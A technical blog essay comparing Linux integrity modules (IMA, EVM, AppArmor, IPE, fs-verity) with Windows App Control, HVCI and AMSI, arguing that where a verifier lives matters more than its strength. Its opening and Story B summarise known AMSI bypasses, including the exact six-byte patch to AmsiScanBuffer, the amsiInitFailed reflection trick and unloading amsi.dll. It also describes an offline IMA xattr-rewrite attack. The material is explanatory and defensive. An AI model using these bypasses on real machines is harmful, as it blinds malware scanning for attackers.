# Two Routes to Code Integrity: Linux IMA + AppArmor vs Windows WDAC + AMSI

> Linux and Windows answer one question -- "is this code allowed to run?" -- with very different machinery. Where the verifier lives matters more than how strong it is.

*Published: 2026-05-16*
*Canonical: https://paragmali.com/blog/two-routes-to-code-integrity-linux-ima--apparmor-vs-windows-*
*License: CC BY 4.0 - https://creativecommons.org/licenses/by/4.0/*

---
<TLDR>
Linux and Windows have spent fifteen years answering the same question -- "is this code allowed to run?" -- and arrived at radically different architectures. Linux composes half a dozen narrow kernel modules (IMA, EVM, AppArmor, SELinux, fs-verity, IPE) plus a userspace daemon (`fapolicyd`); Windows ships one integrated suite (App Control + HVCI + AMSI + Smart App Control). Both stacks shipped their v1 with the **check in the wrong place**, and the architectural pivots that fixed it -- EVM's HMAC-sealed xattrs, HVCI's hypervisor-isolated verifier, IPE's property-based decisions -- are the breakthrough lesson of this comparison. Crypto is solved. Trust-boundary protection and policy expressiveness are not, and Rice's theorem says they never fully will be.
</TLDR>

## 1. Two bypasses, same architectural shape

On a Windows 11 desktop, an attacker with a PowerShell session under their control can blind Microsoft Defender to every script that session ever evaluates by overwriting six bytes inside one function in `amsi.dll`. The [Antimalware Scan Interface](/blog/amsi-the-100-microsecond-window-where-defender-catches-a-bas/), the in-process bridge between scripting hosts and the registered antivirus product, dutifully reports "clean" on every subsequent buffer because the prologue of `AmsiScanBuffer` has been patched to `mov eax, 0; ret` (`B8 00 00 00 00 C3`).

The interface ships exactly as Microsoft documents it, and the function still has the [signature in MSDN](https://learn.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiscanbuffer): the attacker did not need to break anything. They needed only to write into the address space they already owned.

On a Linux server, a different attacker with offline access to the disk -- recovered from a stolen laptop, a forensics image, a hostile cloud-provider snapshot -- mounts the filesystem and rewrites a system binary together with the file's `security.ima` extended attribute. When the box boots, the kernel's Integrity Measurement Architecture hashes the binary at exec time, compares the hash to the value stored in `security.ima`, sees a match, and allows execution. Without the Extended Verification Module, IMA appraisal has [no defence against this offline-rewrite attack](https://lwn.net/Articles/394170/) -- the reference hash is sitting next to the file the attacker just replaced.

Both operating systems claim fail-closed code-integrity enforcement. Both lose to a single architectural mistake about **where the check runs**. The mistakes are different in detail and identical in shape: the verifier is reachable by the attacker. On Windows the attacker shares the script host's address space with the scanner. On Linux the attacker shares the on-disk container with the reference hash.

This article exists to make that symmetry visible. The two stacks reached their 2026 form by very different routes -- Linux composes six narrow Linux Security Modules and one userspace daemon, Windows ships one tightly-coupled product line -- but the breakthroughs on each side answered the same question: how do you move the verifier out of reach?

The Linux answer was EVM (HMAC the extended attributes that IMA depends on) and IPE (decide on immutable file properties rather than file contents). The Windows answer was HVCI (lift the kernel-mode code-integrity check into a hypervisor-isolated secure kernel). The names are different. The lesson is one.

Why did Linux and Windows arrive at such different architectures in the first place? That story starts in an IBM research lab in 2003.

## 2. The question both operating systems are trying to answer

Both lineages exist to answer one question -- "is this code allowed to run?" -- but they put the check in completely different places. Before we can compare them honestly, we need a shared vocabulary for the three layers any production code-integrity stack must cover.

The first layer is **code integrity** itself, often abbreviated CI: a gate on the file's content or its signer. Did this `.so` come from a package my distribution signed? Does this `.exe` match an [Authenticode chain](/blog/authenticode-and-catalog-files-the-crypto-foundation-under-w/) rooted in a publisher my policy trusts? The answer is binary. The hook fires before the process loads the bytes.

The second layer is **mandatory access control**, or MAC. Now the process is running. What can it do? Can `nginx` open `/etc/shadow`? Can `mshta.exe` spawn `cmd.exe`? MAC is enforced by the kernel above discretionary access control and cannot be overridden by userspace privileges.

<Definition term="Mandatory Access Control (MAC)">
A kernel-enforced policy layer above traditional discretionary access control (DAC). Unlike DAC, where the file owner sets permissions, MAC policy is set by the system administrator and applied uniformly to all processes; no user, including root, can override it without changing the policy itself.
</Definition>

The third layer is **content inspection**: gating not on the file but on the buffer the interpreter is about to evaluate. The PowerShell engine has just deobfuscated a long string into a script block. Is the script block malicious? Linux has no production equivalent. Windows ships [AMSI](https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal) for exactly this.

Where each operating system puts these checks tells you almost everything about its architectural philosophy.

Linux puts every check on a [Linux Security Module hook](https://www.kernel.org/doc/html/latest/security/lsm.html). IMA registers at `bprm_check` (the kernel hook that fires when a binary is about to be executed), `file_mmap` with `MAY_EXEC`, `module_check`, `firmware_check`, and `kexec_*`. AppArmor and SELinux register at the syscall-level access hooks. `fapolicyd` rides on top of `fanotify`. IPE hooks `op=EXECUTE`. The kernel is the trust boundary, and every mechanism is a polite tenant inside it.

<Definition term="Linux Security Module (LSM)">
The kernel framework, merged into Linux 2.6.0 in December 2003, that hosts pluggable security modules at well-defined hook points in the kernel. LSMs include SELinux, AppArmor, Smack, Tomoyo, IMA, EVM, IPE, BPF LSM, and Landlock; multiple modules can coexist via "LSM stacking".
</Definition>

Windows takes the opposite path. The PE loader is the gate for user-mode code integrity (UMCI). The kernel-mode code-integrity check is, in the modern stack, moved out of the normal kernel into a small secure kernel running on top of Hyper-V -- [Hypervisor-protected Code Integrity, HVCI](https://learn.microsoft.com/en-us/windows/security/hardware-security/enable-virtualization-based-protection-of-code-integrity). The script broker runs in-process with each scripting host. Cloud reputation is consulted via the Intelligent Security Graph and exposed to consumers as [Smart App Control](/blog/mark-of-the-web-smartscreen-and-the-catalog-of-trust-how-win/).

<Definition term="TPM Platform Configuration Register (PCR)">
A monotonically extendable hash register inside a Trusted Platform Module. New measurements are folded in with `PCR_new = SHA256(PCR_old || measurement)`. Once extended, the value cannot be rolled back without resetting the TPM. IMA extends file-content hashes into PCR 10; the Windows Measured Boot chain uses PCRs 0-7 and 11-14.
</Definition>

The architectural philosophy comes down to a sentence each. Linux trusts the **kernel surface** and packs every integrity mechanism into it as a separate LSM. Windows trusts a **hypervisor-isolated secure kernel** and uses it to host the integrity logic the normal kernel cannot be trusted to run honestly.

<Mermaid caption="The three layers of code-integrity enforcement, and where Linux and Windows place each mechanism.">
flowchart LR
  subgraph CI[Code integrity: gate on file content or signer]
    direction TB
    L_IMA[Linux: IMA + EVM]
    L_IPE[Linux: IPE]
    L_FSV[Linux: fs-verity]
    L_FAP[Linux: fapolicyd]
    W_WDAC[Windows: App Control / WDAC]
    W_HVCI[Windows: HVCI / Memory Integrity]
    W_SAC[Windows: Smart App Control]
  end
  subgraph MAC[Mandatory access control: gate on running process behaviour]
    direction TB
    L_AA[Linux: AppArmor]
    L_SE[Linux: SELinux]
    W_NONE[Windows: no direct analogue, closest is AppContainer / ASR]
  end
  subgraph CS[Content inspection: gate on the buffer the interpreter will evaluate]
    direction TB
    W_AMSI[Windows: AMSI]
    L_GAP[Linux: no production equivalent]
  end
  CI --> MAC --> CS
</Mermaid>

Neither stack started this way. The 2026 stack on each side is the accumulated answer to fifteen years of failures. Here is how they grew up.

## 3. Two genesis stories

In 2003, four IBM researchers at the T. J. Watson Research Center -- Reiner Sailer, Xiaolan Zhang, Trent Jaeger, and Leendert van Doorn -- tried to convince the USENIX Security community that you could prove the integrity of a Linux web server to a remote verifier. Their paper, [*Design and Implementation of a TCG-based Integrity Measurement Architecture*](https://www.usenix.org/legacy/events/sec04/tech/sailer.html), shipped at the 13th USENIX Security Symposium in 2004. It proposed hashing every executable file at load time, extending each hash into a [TPM platform configuration register](/blog/the-tpm-in-windows-one-primitive-twenty-five-years-and-the-c/), and sending the resulting measurement list to a remote verifier who could compare it to a known-good manifest.

The [performance evaluation](https://www.usenix.org/legacy/events/sec04/tech/full_papers/sailer/sailer_html/node19.html) measured the cost on an IBM Netvista with a 2.4 GHz Pentium 4: the `file_mmap` LSM hook added 0.08 microseconds per call on a cache hit, and SHA-1 fingerprinting ran at roughly 80 MB/s. The headline claim was that more than 99.9% of measure calls landed on the cached path, so the overhead was essentially free.

<Sidenote>Pentium 4-era SHA-1 at 80 MB/s vs Ice Lake-era SHA-NI-accelerated SHA-256 at roughly 2 GB/s per core: a 25x throughput jump in twenty years. The original paper's qualitative finding -- cache hit dominates, overhead is negligible -- holds even more strongly on modern silicon.</Sidenote>

It took five years for that proposal to reach the kernel. IMA's measurement-only mode was merged in Linux 2.6.30 in June 2009. It hashed files at `bprm_check`, `file_mmap`, and `module_check`, extended TPM PCR 10, and otherwise let everything run.

The "is this hash allowed?" question would have to wait three more years. The Extended Verification Module landed in Linux 3.2 in January 2012; digital-signature mode for EVM followed in 3.3 in March 2012; and IMA-appraise, the enforcement extension that finally let the kernel return `-EPERM` when a file's hash did not match `security.ima`, [merged in Linux 3.7 in December 2012](https://lwn.net/Articles/488906/). The same LWN article frames the cadence plainly: "Much of IMA was added to the kernel in 2.6.30, but another piece, the extended verification module (EVM) was not merged until 3.2 ... Digital signature support was added to EVM in 3.3, and IMA appraisal is currently under review." [Mimi Zohar's appraisal patchset](https://lwn.net/Articles/487700/) is the canonical lore.kernel.org artifact of that final step.

AppArmor took a different, longer road. It was born inside Immunix in 1998 under the name "SubDomain", a path-based confinement layer designed to stop privilege-escalation exploits from doing anything the binary's profile did not name. Novell acquired Immunix in 2005, renamed SubDomain to AppArmor, and shipped it as the default mandatory access control layer on SLES and openSUSE. According to the [Ubuntu AppArmor wiki](https://wiki.ubuntu.com/AppArmor), "AppArmor support was first introduced in Ubuntu 7.04, and is turned on by default in Ubuntu 7.10 and later" -- so by October 2007 AppArmor was already a default-on production MAC on the most-deployed Linux desktop distribution.

Mainlining did not happen until October 2010, when AppArmor finally landed in [Linux 2.6.36](https://docs.kernel.org/admin-guide/LSM/apparmor.html). Seven years out of tree, three years default-on in Ubuntu, before the kernel community accepted it.

The contrast with [SELinux](https://en.wikipedia.org/wiki/Security-Enhanced_Linux) is sharp. SELinux merged into Linux 2.6.0 in December 2003 -- barely a year after the LSM framework was created. SELinux was, in fact, the reason the LSM framework existed.

<Aside label="Why AppArmor's upstream journey took seven years">
SELinux's type-enforcement model maps directly to LSM's "label the subject, label the object, look up the rule" hook signature. AppArmor's path-based reasoning does not. LSM hooks see inodes, not paths -- and an inode can be reached from many paths (bind mounts, hard links, namespace games, chroots). To merge, AppArmor had to push kernel-side helpers like `vfs_path_lookup` and `d_absolute_path` upstream so it could reconstruct the absolute path of the object at hook time. The conceptual fight took three rejected merge attempts and seven years. The lesson is one Linux kernel reviewers have repeated since: a security model is not just an algorithm, it is a commitment to a particular kind of name-resolution semantics.
</Aside>

The Windows lineage starts in a different building entirely. AppLocker shipped with Windows 7 and Windows Server 2008 R2 in 2009: a user-mode-only allowlist, with no hypervisor or kernel-mode backing, and rules tied to file paths, publishers, or hashes. AppLocker is [still supported on modern Windows but "isn't getting new feature improvements"](https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview); the modern successor is App Control for Business.

Windows 10 RTM (version 1507, July 2015) shipped the first version of Device Guard along with [AMSI](https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal) and PowerShell 5.0, which integrated with AMSI from day one. Device Guard became known as Windows Defender Application Control (WDAC) and then, in 2024, was renamed once more to *App Control for Business*. User-mode code integrity (UMCI) became a policy option, FilePath rules were [added in Windows 10 version 1903](https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/wdac-and-applocker-overview), multiple-policy authoring landed in the same release, and Smart App Control made its consumer debut in [Windows 11 22H2 in September 2022](https://blogs.windows.com/windowsexperience/2022/09/20/available-today-the-windows-11-2022-update/).

<Mermaid caption="Code-integrity lineages on Linux and Windows, 2003 to 2024. Linux composes; Windows consolidates.">
gantt
  title Linux and Windows code-integrity timeline
  dateFormat YYYY-MM
  axisFormat %Y
  section Linux
  SELinux mainline 2.6.0    :2003-12, 12M
  AppArmor at Immunix       :1998-01, 84M
  AppArmor default in Ubuntu :2007-10, 36M
  IMA mainline 2.6.30        :2009-06, 32M
  EVM mainline 3.2           :2012-01, 2M
  EVM digital sigs 3.3       :2012-03, 9M
  IMA-appraise 3.7           :2012-12, 24M
  AppArmor mainline 2.6.36   :2010-10, 14M
  fs-verity 5.4              :2019-11, 60M
  IPE 6.12                   :2024-11, 12M
  section Windows
  AppLocker (Win 7)          :2009-10, 70M
  Device Guard + AMSI + PowerShell 5 (1507) :2015-07, 25M
  WDAC UMCI (1709)           :2017-10, 18M
  FilePath rules + multi-policy (1903) :2019-05, 24M
  HVCI broadens (Win 10 1607+) :2016-08, 60M
  Smart App Control (Win 11 22H2) :2022-09, 24M
  App Control for Business rename :2024-01, 12M
</Mermaid>

Two timelines, two design philosophies, both shipping their v1 with the same kind of mistake. The next section makes that concrete.

## 4. Where the naive approach breaks

Both stacks shipped their first version with the check in the wrong place. Two stories make this concrete; two more refine it.

### Story A: IMA-as-shipped (2009) without EVM

When IMA reached the kernel in Linux 2.6.30, it hashed the file at `bprm_check` and stored the reference hash in the file's `security.ima` extended attribute. That is what an attacker with offline disk access needs to defeat the check, and exactly nothing else. Mount the filesystem from another box, swap the binary for a malicious one, recompute the SHA over the new binary, write the new value into `security.ima`. Boot the box. The kernel hashes the malicious binary at exec, reads the matching xattr the attacker just wrote, and lets the syscall through.

This is the offline-tampering attacker model EVM was designed to defeat. The contemporaneous LWN coverage put it plainly: ["IMA can be subverted by 'offline' attacks, where file data or metadata is changed out from under IMA. Mimi Zohar has proposed the extended verification module (EVM) patch set as a means to protect against these offline attacks."](https://lwn.net/Articles/394170/)

The [EVM v5 patchset](https://lwn.net/Articles/443038/), posted by Zohar in May 2011, describes the design directly: "Extended Verification Module (EVM) detects offline tampering of the security extended attributes (e.g. security.selinux, security.SMACK64, security.ima) ... initial method maintains an HMAC-sha1 across a set of security extended attributes, storing the HMAC as the extended attribute 'security.evm'."

### Story B: AMSI as shipped (2015) inside the script host

AMSI's design is documented in [*How AMSI helps you defend against malware*](https://learn.microsoft.com/en-us/windows/win32/amsi/how-amsi-helps): "Script (malicious or otherwise), might go through several passes of de-obfuscation. But you ultimately need to supply the scripting engine with plain, un-obfuscated code. And that's the point at which you invoke the AMSI APIs."

A scripting host -- PowerShell, WSH, MSHTA, Office VBA, the UAC installer dialog -- calls `AmsiInitialize`, then for every plain-text script buffer it is about to execute calls [`AmsiScanBuffer`](https://learn.microsoft.com/en-us/windows/win32/api/amsi/nf-amsi-amsiscanbuffer) or `AmsiScanString`. The call is routed through `amsi.dll`, loaded into the host process, which dispatches to the registered `IAntimalwareProvider` COM server. Defender is the default provider.

The detection logic is sound. The trust boundary is not. The attacker already controls the script host. Three single-shot bypass techniques have lived in red-team toolkits since 2016:

1. Patch `AmsiScanBuffer`'s prologue in memory to `mov eax, 0; ret` (`B8 00 00 00 00 C3`). Six bytes of opcode rewrite, no syscalls required, blinds the scanner permanently for this process.
2. Set `System.Management.Automation.AmsiUtils.amsiInitFailed = true` via reflection. PowerShell checks the flag on every scan path and short-circuits.
3. Unload `amsi.dll` via `FreeLibrary`. There is no scanner left to call.

Microsoft tracks this so closely that its own ["Applications that can bypass App Control"](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/applications-that-can-bypass-appcontrol) deny list calls out the AMSI-bypass-capable versions of `system.management.automation.dll` by hash. The defender's authoritative list of files-to-block treats specific signed Microsoft DLLs as named threats.

<Sidenote>The same Microsoft bypass list also enumerates `mshta.exe`, `wscript.exe`, `cscript.exe`, `msbuild.exe`, `Microsoft.Build.dll`, `windbg.exe`, `cdb.exe`, `kd.exe`, `dotnet.exe`, `csi.exe`, `rcsi.exe`, `addinprocess.exe`, `wmic.exe`, `bash.exe`, `wsl.exe`, `runscripthelper.exe`, and dozens of others -- 40+ entries today, growing whenever a new Microsoft-signed binary turns out to host an attacker-friendly evaluator.</Sidenote>

> **Note:** The host process making the AMSI call is the same process the attacker is running in. Any defence-in-depth plan that treats AMSI as a hard control is mis-specified. Treat AMSI as a high-quality telemetry surface feeding Defender for Endpoint and EDR pipelines; budget for the bypass.

<RunnableCode lang="js" title="Why AMSI's trust boundary is wrong: the simplest model of an in-process bypass">{`
// In Windows, AMSI scans each plain-text script buffer just before
// the scripting engine evaluates it. The scanner lives in amsi.dll,
// loaded into the script host process. The attacker who controls
// that process can rewrite the function's first few bytes.
//
// This toy model shows the consequence: once "patched", the scanner
// returns CLEAN regardless of input, and the assertion below holds
// for every possible payload.

const AMSI_RESULT_CLEAN = 0;
const AMSI_RESULT_MALWARE = 32768;

function amsiScanBuffer(buf, patched) {
  if (patched) return AMSI_RESULT_CLEAN;
  if (buf.includes("Invoke-Mimikatz")) return AMSI_RESULT_MALWARE;
  return AMSI_RESULT_CLEAN;
}

console.log("Normal mode:");
console.log("  clean payload:    ", amsiScanBuffer("Get-Process", false));
console.log("  malicious payload:", amsiScanBuffer("Invoke-Mimikatz", false));

console.log("\\nAfter six-byte patch:");
console.log("  clean payload:    ", amsiScanBuffer("Get-Process", true));
console.log("  malicious payload:", amsiScanBuffer("Invoke-Mimikatz", true));

// The takeaway: no input ever produces MALWARE once the scanner is patched.
// Strengthening AMSI's signature engine cannot fix this. The scanner
// must move out of the script host's address space.
`}</RunnableCode>

### Story C: WDAC's "trust all Microsoft-signed code" anti-pattern

A [WDAC policy](/blog/wdac--hvci-code-integrity-at-every-layer-in-windows/) that trusts code signed by Microsoft also trusts every binary Microsoft has ever signed. That set includes `mshta.exe`, `wscript.exe`, `cscript.exe`, `msbuild.exe`, `wmic.exe`, `system.management.automation.dll`, and the 40-plus other binaries enumerated on Microsoft's own [App Control bypass list](https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/applications-that-can-bypass-appcontrol). The [LOLBAS community catalogue](https://lolbas-project.github.io/) widens the field to roughly 200 living-off-the-land binaries with explicit MITRE ATT&CK technique mappings.

The pattern is structural: WDAC grants trust at *signer* granularity (a chain rooted at "Microsoft Corporation"); attackers exploit at *binary* granularity (the specific `mshta.exe` that will happily evaluate an HTA blob containing a PowerShell stager). Any non-trivial WDAC policy must therefore contain explicit hash-level denies for the known-bad versions, and must keep growing those denies as Microsoft ships new signed binaries.

### Story D: fapolicyd's permissive-window failure

[fapolicyd](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/security_hardening/assembly_blocking-and-allowing-applications-using-fapolicyd_security-hardening) is the Red Hat userspace allowlister. It sits on the `fanotify` permission channel and answers "may this open or exec proceed?" against a compiled rule database. It does not have IMA's offline-tampering problem because trust is inherited from the RPM database: "An application is trusted when the system package manager correctly installs it and therefore registered in the system RPM database. The fapolicyd daemon uses the RPM database as a list of trusted binaries and scripts."

What it does have is an operational footgun. Setting `permissive=1` "just for troubleshooting" silently disables enforcement. Terminating the daemon causes the kernel to fail open after the fanotify response timeout. The architectural choice -- userspace daemon over kernel-mode hook -- is what makes both failure modes possible.

> **Key idea:** The check was strong. The boundary protecting the check was weak. On IMA-as-shipped the reference hash sat next to the file the attacker rewrote. On AMSI the scanner sat inside the process the attacker controlled. On WDAC the trust grant was wider than the exploitation unit. On fapolicyd the verifier was a userspace process that could be terminated. Four different stacks, four different boundary failures, one identical lesson.

| Bypass class | Stack | Concrete example | Root cause |
|---|---|---|---|
| Offline metadata swap | IMA without EVM | Rewrite binary and matching `security.ima` xattr from rescue media | Reference value stored next to the file under attacker control |
| In-process scanner patch | AMSI in PowerShell | `mov eax, AMSI_RESULT_CLEAN; ret` over `AmsiScanBuffer` prologue | Scanner shares address space with the script host the attacker runs in |
| Signer-vs-binary mismatch | WDAC Publisher rules | Allow Microsoft-signed code, attacker runs `mshta.exe` | Trust grant is coarser than the exploitable unit |
| Daemon liveness | fapolicyd | Terminate `fapolicyd` or set `permissive=1` | Verifier is a userspace process with no kernel-rooted backstop |

Each of these failures has the same shape: the check was strong, the boundary protecting the check was weak. Both operating systems noticed, and fixed it in 2012 and 2016 in very different ways. Both fixes followed the same principle.

## 5. The architectural pivots

Both lineages reached the same conclusion at the same time: strengthen the boundary, not the check. Each pivot moved the trust boundary outward, beyond the place the attacker could reach.

### EVM (Linux 3.2, January 2012): the xattrs become non-forgeable

The Extended Verification Module computes an HMAC over the security-relevant extended attributes -- `security.ima`, `security.selinux`, `security.SMACK64`, `security.apparmor`, `security.capability` -- plus inode metadata (UID, GID, mode, generation), and stores the result in `security.evm`. The HMAC key is loaded into the kernel keyring at boot, ideally sealed to a TPM 2.0 PCR set so the key is not retrievable except on a machine whose boot state matches the sealing measurement. The [kernel keyring documentation for trusted and encrypted keys](https://www.kernel.org/doc/html/latest/security/keys/trusted-encrypted.html) describes the substrate.

An offline attacker with disk access still cannot forge `security.evm` without the HMAC key. Digital-signature mode (EVM portable signatures, Linux 3.3) gives the same guarantee without any on-box key material. The check did not get cryptographically stronger: HMAC-SHA256 was not new in 2012. What changed was that the *reference value* the check consults moved from "an xattr next to the file" to "an xattr whose integrity is bound to a key the attacker does not have". Red Hat documents the modern setup in [*Enhancing security with the kernel integrity subsystem*](https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/security_hardening/enhancing-security-with-the-kernel-integrity-subsystem_security-hardening).

<Definition term="Extended Verification Module (EVM)">
The Linux integrity module that protects the security-relevant extended attributes IMA depends on. EVM computes an HMAC (or digital signature) over the xattr set plus inode metadata and stores it in `security.evm`. Without the EVM key, an offline attacker cannot rewrite a binary and its matching `security.ima` to produce a valid pair.
</Definition>

<Mermaid caption="IMA + EVM appraisal flow at bprm_check. EVM verifies the integrity of the xattr IMA reads; without EVM, IMA's reference value is offline-rewritable.">
sequenceDiagram
  participant App as User app
  participant K as Kernel
  participant FS as Filesystem
  participant IMA as IMA
  participant EVM as EVM
  participant TPM as TPM keyring
  App->>K: execve("/usr/bin/foo")
  K->>IMA: bprm_check hook
  IMA->>FS: read file bytes
  IMA->>IMA: compute SHA-256
  IMA->>FS: read security.ima xattr
  IMA->>EVM: verify xattr integrity
  EVM->>FS: read security.evm and full xattr set
  EVM->>TPM: HMAC key from keyring (sealed to PCRs)
  EVM->>EVM: recompute HMAC over xattr set + inode meta
  alt HMAC matches and IMA hash matches
    EVM-->>IMA: ok
    IMA-->>K: allow
    K-->>App: exec proceeds
  else mismatch
    EVM-->>IMA: -EPERM
    IMA-->>K: deny
    K-->>App: -EPERM
  end
</Mermaid>

### IMA-appraise (Linux 3.7, December 2012): from observation to enforcement

The merge cadence on the kernel side is itself part of the story. Measurement-only IMA shipped in 2.6.30 in 2009. EVM merged in 3.2 in January 2012. EVM digital signatures merged in 3.3 in March 2012. IMA-appraise, which finally lets the kernel return `-EPERM` on a hash mismatch, [merged in Linux 3.7 in December 2012](https://lwn.net/Articles/488906/). Three and a half years from "we hash files" to "we refuse to run files that fail the hash". The gap was not engineering laziness; it was the time it took to design and merge the boundary-strengthening pieces that made enforcement safe to enable.

### HVCI / Memory Integrity (Windows 10 1607, August 2016): the secure kernel

Windows took the equivalent step four years later, but at a different layer. [Virtualization-Based Security (VBS)](https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs) splits Windows into Virtual Trust Level 0 -- the normal kernel everyone has been writing rootkits for since 1993 -- and Virtual Trust Level 1, a small [secure kernel](/blog/when-system-isnt-enough-the-windows-secure-kernel-and-the-en/) hosted by Hyper-V. The kernel-mode Code Integrity check that gates loading of every driver is moved into VTL1. A VTL0 attacker with full SYSTEM, even one who has loaded a malicious driver, cannot patch the VTL1 verifier; they cannot even read its memory.

<Definition term="Virtualization-Based Security (VBS) / VTL0 vs VTL1">
Windows' Hyper-V-rooted split that puts a small secure kernel in VTL1, isolated from the normal Windows kernel (VTL0) by the hypervisor. Hypervisor-protected Code Integrity (HVCI), exposed in Windows Settings as "Memory integrity", uses VTL1 to host the kernel-mode code-integrity check, so a VTL0 attacker with SYSTEM cannot patch the verifier or downgrade its policy.
</Definition>

[Microsoft's HVCI documentation](https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs) frames the W^X invariant HVCI enforces on kernel pages: "memory integrity ... protects and hardens Windows by running kernel mode code integrity within the isolated virtual environment of VBS ... ensuring that kernel memory pages are only made executable after passing code integrity checks inside the secure runtime environment, and executable pages themselves are never writable." A kernel page can be writable or executable; never both at the same time. The split is enforced by the hypervisor.

<Sidenote>"HVCI", "Memory Integrity", and "kernel-mode code integrity running in VBS" are the same mechanism. Microsoft's product-name churn here is unusually thick: the Windows Settings UI calls it Memory Integrity, the documentation page is titled "Enable virtualization-based protection of code integrity", the underlying capability is HVCI, and Microsoft also markets the same hardware-and-software bundle as "Secured-Core PC".</Sidenote>

<Mermaid caption="HVCI relocates the kernel-mode code-integrity check into VTL1. A VTL0 attacker with SYSTEM cannot reach the verifier.">
flowchart TD
  subgraph VTL0[VTL0: normal Windows kernel]
    P[User process]
    DRV[Driver load request]
    RK[Hypothetical rootkit with SYSTEM]
    K0[NT kernel]
    P --> K0
    DRV --> K0
    RK --> K0
  end
  K0 -->|hypercall: verify driver| HV[Hypervisor]
  RK -.X.-> SK
  HV --> SK
  subgraph VTL1[VTL1: secure kernel]
    SK[Secure kernel]
    CI[Kernel-mode CI verifier]
    SK --> CI
  end
  CI -->|allow / deny| HV
  HV -->|result| K0
</Mermaid>

### IPE (Linux 6.12, November 2024): property-based decisions

The most recent Linux pivot moves further still. [Integrity Policy Enforcement](https://docs.kernel.org/admin-guide/LSM/ipe.html), upstreamed in Linux 6.12 in November 2024 from a Microsoft-contributed patch series ([source on GitHub](https://github.com/microsoft/ipe)), does not hash files at all. Its kernel documentation is explicit: "Integrity Policy Enforcement (IPE) is a Linux Security Module that takes a complementary approach to access control. Unlike traditional access control mechanisms that rely on labels and paths for decision-making, IPE focuses on the immutable security properties inherent to system components." A policy rule looks like:

```
op=EXECUTE dmverity_signature=TRUE dmverity_roothash=sha256:<hex> action=ALLOW
op=EXECUTE fsverity_signature=TRUE action=ALLOW
op=EXECUTE action=DENY
```

The kernel is not asked "what is the SHA-256 of this file?" at `op=EXECUTE` time. It is asked "did this file come from a dm-verity device whose root hash matches one of our trusted signatures?" The verifier has nothing to compute per access; it has only to read a pre-computed property. The trust boundary has moved out to whoever signed the dm-verity image at build time.

### fs-verity (Linux 5.4, November 2019): O(log n) per page

The cryptographic complement is [fs-verity](https://www.kernel.org/doc/html/latest/filesystems/fsverity.html), upstreamed in Linux 5.4 in November 2019 by Eric Biggers and Theodore Ts'o at Google. The kernel docs describe the trick: "fs-verity is similar to dm-verity but works on files rather than block devices ... userspace can execute an ioctl that causes the filesystem to build a Merkle tree for the file and persist it to a filesystem-specific location ... Userspace can use another ioctl to retrieve the root hash ... in constant time, regardless of the file size."

The Merkle tree turns whole-file hashing into O(log n) verification per page read, with constant-time digest retrieval. Concretely, an APK or container layer with thousands of pages does not need a full hash on first open; the page cache verifies the leaves and intermediate Merkle nodes only for the pages actually touched. IMA can consume fs-verity's digest directly through the `digest_type=verity` modifier in its policy language.

<PullQuote>
The breakthrough was not a stronger check. It was moving the check out of the attacker's address space.
</PullQuote>

Each pivot moved the trust boundary outward in a different direction. EVM moved the integrity root from "xattr next to the file" to "HMAC-keyed xattr, key sealed to TPM PCRs". HVCI moved the kernel-mode verifier from "in the kernel the attacker can patch" to "in a secure kernel the attacker cannot reach without breaking the hypervisor". IPE moved the per-access decision from "recompute a file's hash" to "look up a precomputed property". Fs-verity collapsed the per-access cost from O(n) on the file to O(log n) on a Merkle path.

The crypto was already strong. The breakthrough was the geometry of where the verifier lived.

By 2020 both stacks looked dramatically different from their 2009 and 2015 originals. Here is what each one looks like today, side by side.

## 6. The stack today, side by side

Eleven moving parts. Here is how they line up.

| Linux | Windows | Layer |
|---|---|---|
| IMA appraise + EVM | App Control (WDAC) UMCI | User-mode code integrity |
| Kernel module signing | App Control + HVCI driver enforcement | Kernel-mode code integrity |
| fs-verity + dm-verity | HVCI page-level W^X + signed catalogues | Page-level integrity |
| AppArmor / SELinux | (no direct analogue; closest is AppContainer / ASR) | Mandatory access control |
| fapolicyd | App Control + AppLocker | User-space allowlist |
| IPE | App Control (FilePath / hash rules) | Property-based code integrity |
| (no direct analogue) | AMSI | Script content scan |
| (no direct analogue) | Smart App Control + ISG | Cloud reputation |

The mapping is not 1-to-1 in either direction. Linux composes; Windows consolidates. To compare meaningfully we have to look at each layer in turn.

### 6.1 Code-integrity enforcers: IMA + EVM vs WDAC vs IPE

| Dimension | Linux IMA + EVM | WDAC (App Control) | IPE |
|---|---|---|---|
| Enforcement layer | VFS / LSM hook (file open, mmap, exec) | PE loader (kernel CI, user-mode CI) | LSM hook on `op=EXECUTE` |
| Identity primitive | File-content hash or `imasig` / `modsig` / `sigv3` | Authenticode chain, hash, FilePath, or ISG | dm-verity root hash / fs-verity digest |
| Policy expression | Procedural rules (`func=` / `mask=` / `fsmagic=`) | Signed XML compiled to binary `.p7b` | Signed plain-text DFA |
| Worst-case per-access | O(n) hash on first access; O(1) cached | O(1) cached; O(n) hash on cache miss | O(1) (properties precomputed) |
| Fail-closed mode | Yes (appraise) | Yes (enforced) | Yes |
| Remote-attestation friendly | Yes (TPM PCR 10) | Indirect (Measured Boot logs) | Indirect |
| Bypass arms race | Whole-disk swap (countered by EVM key sealing) | LOLBins (Microsoft block list + community LOLBAS) | Limited surface (DFA-only) |

The [IMA policy ABI](https://www.kernel.org/doc/Documentation/ABI/testing/ima_policy) documents the full rule grammar: `action [condition ...]` where action is one of `measure | dont_measure | appraise | dont_appraise | audit | dont_audit | hash | dont_hash`, and conditions select on `func=`, `mask=`, `fsmagic=`, `fsuuid=`, `uid=`, `fowner=`, LSM-label predicates, and the all-important `appraise_type=` modifier that names the signature scheme. [IMA template management](https://docs.kernel.org/security/IMA-templates.html) controls *what* gets recorded per measurement-list entry; the two templates used in practice today are `ima-ng` (`d-ng|n-ng`: hash-algo-prefixed digest plus name) and `ima-sigv2` (`d-ngv2|n-ng|sig`: versioned digest plus name plus signature).

